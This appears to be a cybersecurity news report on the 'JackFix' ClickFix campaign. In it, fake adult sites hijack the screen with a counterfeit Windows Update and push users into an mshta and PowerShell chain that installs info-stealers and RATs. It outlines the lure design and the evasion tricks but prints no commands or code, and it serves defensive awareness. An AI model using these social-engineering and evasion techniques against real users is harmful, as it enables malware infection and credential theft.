A sophisticated ClickFix campaign dubbed “JackFix” that uses fake adult websites to hijack screens with realistic Windows Update prompts, tricking users into running multistage malware payloads.
Attackers mimic popular adult sites like xHamster clones to lure victims, likely via malvertising on shady platforms. Interaction with the phishing page triggers a full-screen overlay resembling a critical Windows security update, complete with animations, progress bars, and blue-screen styling.
This “screen hijacking” combines urgency from the update theme with embarrassment from adult content, pressuring hasty compliance.
The attack’s entry point often involves fake adult websites, such as clones of popular platforms like xHamster and PornHub, which are likely promoted through malvertising.
Once a user interacts with one of these sites, the “JackFix” attack is triggered. The browser is forced into full-screen mode, displaying a convincing “Critical Windows Security Updates” screen, complete with animations and progress counters.
JackFix Attack Leverages Windows Updates
This screen-locking technique, reminiscent of older screen-locker malware, pressures the victim into following on-screen instructions to resolve a fabricated security issue.
The fake interface disables standard escape keys like Escape and F11, though not fully effectively in tested browsers. This method preys on a user’s sense of urgency and familiarity to compromise their systems.
The threat actors have implemented several advanced methods to evade detection. The campaign not only obfuscates its malware payloads but also the very commands used to initiate the ClickFix attack, allowing it to bypass many current prevention tools.
Furthermore, the malicious URLs used in the attack employ a clever redirection strategy. If accessed directly, they redirect to benign sites like Google or Steam, but they deliver the malicious payload only when accessed via specific PowerShell commands.
This tactic helps the attacker’s infrastructure avoid being flagged as malicious by security analysis tools like VirusTotal.
Once the victim is tricked into running the initial commands, a multistage attack chain is initiated. The process begins with mshta, which leads to a PowerShell downloader.
This second-stage script bombards the user with User Account Control (UAC) prompts, effectively rendering the machine unusable until administrative privileges are granted. After gaining elevated access, the script proceeds to deploy a staggering number of malware samples simultaneously.
In what researchers describe as a “spray and prey” strategy, a single infection can execute eight different malware variants. The deployed malware includes the latest versions of potent info-stealers like Rhadamanthys, Vidar 2.0, and RedLine, as well as the Amadey botnet client and various loaders and Remote Access Trojans (RATs).
This massive deployment ensures that even if some payloads are blocked, others are likely to succeed, posing a severe risk of data theft, including passwords and cryptocurrency wallets.
The researchers noted that this unique combination of psychological manipulation, advanced obfuscation, and multi-payload delivery makes the “JackFix” campaign a significant and evolving threat.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
